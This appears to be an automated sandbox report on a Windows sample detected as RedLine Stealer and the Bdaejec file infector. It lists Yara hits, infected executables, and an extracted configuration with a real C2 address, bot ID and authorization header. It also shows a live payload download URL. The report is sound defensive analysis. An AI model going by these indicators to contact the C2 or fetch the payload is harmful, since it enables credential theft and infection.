Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3277082749.0000000005370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe PID: 1220, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: IoUNtL.exe PID: 2920, type: MEMORYSTR

Yara detected RedLine Stealer

Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3277082749.0000000005370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe PID: 1220, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false
193.106.191.123	unknown	Russian Federation		42238	BOSPOR-ASRU	true

Contacted Domains

Name	IP	Active
ddos.dnsnb8.net	44.221.84.105	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
193.106.191.123:34450	true	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar	true	URL Reputation: malware	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net/	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarz	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.raru	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarA	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarcC:	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B

Found malware configuration

Source: 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: RedLine {"C2 url": "193.106.191.123:34450", "Bot Id": "50n", "Authorization Header": "d61a9ba1568b3b8e34c959aa0f254969"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Unpacked PE file: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.unpack

Uses 32bit PE files

Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.00000000006FE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb< source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32^ source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\yolarogi62\xemojecu_butupibojeyet\wefiwuroxiv\xuruka.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
Source:	Binary string: `C:\yolarogi62\xemojecu_butupibojeyet\wefiwuroxiv\xuruka.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source:	Binary string: System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004D38000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbW.: source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdbu source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Code function: 1_2_00F429E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

1_2_00F429E2

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Code function: 1_2_00F42B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_00F42B8C

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 193.106.191.123:34450

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49704 -> 799

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 44.221.84.105:799
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 193.106.191.123:34450

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 44.221.84.105 44.221.84.105
Source: Joe Sandbox View	IP Address: 193.106.191.123 193.106.191.123

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: BOSPOR-ASRU BOSPOR-ASRU

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Code function: 1_2_00F41099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

1_2_00F41099

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

Source: IoUNtL.exe, 00000001.00000003.2016658609.0000000000840000.00000004.00001000.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2257080377.0000000000F43000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: IoUNtL.exe, 00000001.00000002.2256665001.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027571352.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027529653.00000000008EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/
Source: IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2256774762.0000000000945000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027571352.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2257143065.000000000245A000.00000004.00000010.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027529653.00000000008EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2256774762.0000000000945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarA
Source: IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcC:
Source: IoUNtL.exe, 00000001.00000002.2256665001.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027571352.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027529653.00000000008EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.raru
Source: IoUNtL.exe, 00000001.00000002.2257143065.000000000245A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarz
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002760000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002791000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1LR
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002760000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002791000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response(
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002760000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002791000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2LR
